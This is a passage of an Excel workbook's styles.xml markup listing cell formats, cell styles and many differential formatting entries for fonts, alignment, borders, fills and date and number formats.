    <xf numFmtId="22" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="46" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="1" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="14" fontId="19" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="25" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="24" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="26" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="15" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" pivotButton="1" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" pivotButton="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="19" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="14" xfId="0" pivotButton="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="22" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="46" fontId="34" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="34" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="13" xfId="0" pivotButton="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="2" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1"/>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="46" fontId="37" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="164" fontId="37" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="17" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="17" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" pivotButton="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="18" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="10" fontId="4" fillId="0" borderId="24" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Normal 2 7" xfId="1" xr:uid="{00000000-0005-0000-0000-000001000000}"/>
    <cellStyle name="Normal 6" xfId="2" xr:uid="{00000000-0005-0000-0000-000002000000}"/>
  </cellStyles>
  <dxfs count="1674">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font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="left"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="6" tint="0.39997558519241921"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="2" tint="-0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3"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font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="left"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment wrapText="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="6" tint="0.39997558519241921"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <bgColor theme="3" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="2" tint="-0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="3" tint="0.399975585192419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textRotation="0"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="top"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertic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horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="8"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="left"/>
    </dxf>
    <dxf>
      <font>
        <sz val="16"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
        <sz val="16"/>
      </font>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wrapText="1"/>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vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertic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horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>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right/>
        <top/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>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ttom/>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>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right/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>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6"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>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border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>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right/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="12"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <b/>
      </font>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>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right/>
        <top/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>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ttom/>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>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right/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <numFmt numFmtId="14" formatCode="0.0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6"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>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border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>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right/>
        <bottom/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <font>
        <sz val="18"/>
      </font>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ttom/>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>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right/>
      </border>
    </dxf>
    <dxf>
      <numFmt numFmtId="14" formatCode="0.0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6"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>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border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <color theme="1" tint="0.499984740745262"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <right/>
        <top/>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right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>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border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <border>
        <right style="medium">
          <color indexed="64"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <border>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <alignment vertical="center"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>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ttom/>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>
    </dxf>
    <dxf>
      <alignment textRotation="90"/>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right/>
      </border>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6"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>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border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <alignment textRotation="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <font>
        <sz val="9"/>
      </font>
    </dxf>
    <dxf>
      <border>
        <left/>
        <right/>
        <top/>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <top style="medium">
          <color indexed="64"/>
        </top>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <alignment wrapText="1"/>
    </dxf>
    <dxf>
      <alignment horizontal="center"/>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <right style="medium">
          <color indexed="64"/>
        </right>
        <top style="medium">
          <color indexed="64"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
        <bottom style="medium">
          <color indexed="64"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <left style="medium">
          <color indexed="64"/>
        </left>
      </border>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bottom"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dxf>
    <dxf>
      <numFmt numFmtId="19" formatCode="d/mm/yyyy"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="1"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vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>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alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="31" formatCode="[h]:mm:ss"/>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7" formatCode="d/mm/yyyy\ hh:mm"/>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="27" formatCode="d/mm/yyyy\ hh:mm"/>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>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27" formatCode="d/mm/yyyy\ hh:mm"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>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bottom"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vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="0" formatCode="General"/>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>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center" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="31" formatCode="[h]:mm:ss"/>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <numFmt numFmtId="27" formatCode="d/mm/yyyy\ hh:mm"/>
